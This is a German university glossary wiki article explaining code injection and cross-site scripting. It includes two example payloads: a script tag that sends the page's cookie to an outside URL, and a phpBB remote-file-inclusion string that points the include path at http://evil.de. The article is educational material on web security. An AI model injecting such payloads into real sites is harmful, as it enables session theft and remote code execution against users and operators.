Code Injection

aus GlossarWiki, der Glossar-Datenbank der Fachhochschule Augsburg
Wechseln zu:Navigation, Suche

Dieser Artikel erfüllt die GlossarWiki-Qualitätsanforderungen nur teilweise:

Korrektheit: 2
(teilweise überprüft)
Umfang: 3
(einige wichtige Fakten fehlen)
Quellenangaben: 5
(vollständig vorhanden)
Quellenarten: 5
(ausgezeichnet)
Konformität: 4
(sehr gut)

1 Definition

Unter Code Injection versteht man, dass unerwünschter Code in eine Webanwendung eingeschleust wird, der künftig von Clients (Browser) oder sogar vom Server ausgeführt wird. Code Injection ist üblicherweise Bestandteil des Cross Site Scripting und findet seinen Einsatz in variablen Bereichen dynamischer Websites, also überall dort, wo Benutzer etwas selbstständig eintragen dürfen.

2 Bemerkungen

Entscheidend hierbei ist, dass der Browser, in dem eine manipulierte Webseite dargestellt wird, nichts über den Zweck oder Ursprung des in dieser Seite enthaltenen Codes wissen kann und deswegen auch den injizierten Code gewissenhaft ausführt.

Da der hinzugefügte Code zum Teil der Seite wird, verfügt er auch über die Berechtigungen der Seite, weswegen Verschlüsselungstechniken und ähnliche Sicherheitsvorkehrungen nutzlos werden.

Vor allem bei Webseiten, die die Eingabe von Benutzern anschließend anzeigen und dabei diese Eingaben vorher nicht ausreichend filtern und prüfen, kann Code injiziert werden. Werden die Eingaben in Gästebüchern, Foren, privaten Nachrichten oder anderen Anwendungen, die auf den gleichen Prinzipien basieren, nicht ausreichend geprüft, könnten diese zum Injizieren von Code verwendet werden.

3 Beispiel: Stehlen eines Cookies

Es sei eine ungesicherte dynamische Seite gegeben, die mit PHP geschrieben wurde und mit der ein Benutzer Kommentare erstellen und sich anzeigen lassen kann. Auf dieser Seite gebe es ein Formular mit einem Titel- und einem Text-Feld. Das PHP-Skript speichere im Browser des Benutzers ein Cookie:

setcookie("cook" , "some interesting content" );

Um dieses Cookie zu stehlen, kann der Angreifer (nachdem der Inhalt des Textfelds und des Titelfelds nicht gefiltert wird) in das Textfeld folgenden JavaScript-Code eintragen:

<script>
  document.location="https://www.buggysite.com/buggyscript.php?info="+document.cookie;
</script>

Anschließend wird im Browser der folgende Link angezeigt:

https://www.buggysite.com/buggyscript.php?info=cook=some+interesting+content

Es ist deutlich zu sehen, dass die Daten aus dem Cookie ausgelesen und nun dem Angreifer bekannt sind.

4 Beispiel: Umleitung einer Seite

Das Freeware-Tool phpBB, das es dem Benutzer ermöglicht, auch ohne weiterführende Programmier- oder HTML-Kenntnisse Foren zu erstellen und zu administrieren, wurde durch eine PHP Anweisung anfällig für Cross Site Scripting. Dies wird mit einem Beispiel aus Rütten, Glemser (2006) vorgeführt.

Mit der Anweisung

include_once($phpbb_root_path=’common.php’)

wird die Datei „common.php“ aus dem Root-Verzeichnis geladen. Dies ließ sich jedoch ausnutzen, indem man folgendem Code injizierte:

/plugin.php&phpbb_root_path=http://evil.de

Dies führte dazu, das statt der gewünschten Datei die Datei http://evil.de/common.php ausgeführt wurde. Diese Lücke ist zwar bei den neueren Versionen von phpBB geschlossen, verdeutlicht aber das Prinzip der Codeinjektion und ist immer noch aktuell für selbst geschriebene PHP-Seiten.

5 Gängige Vertreter

6 Quellen

7 Siehe auch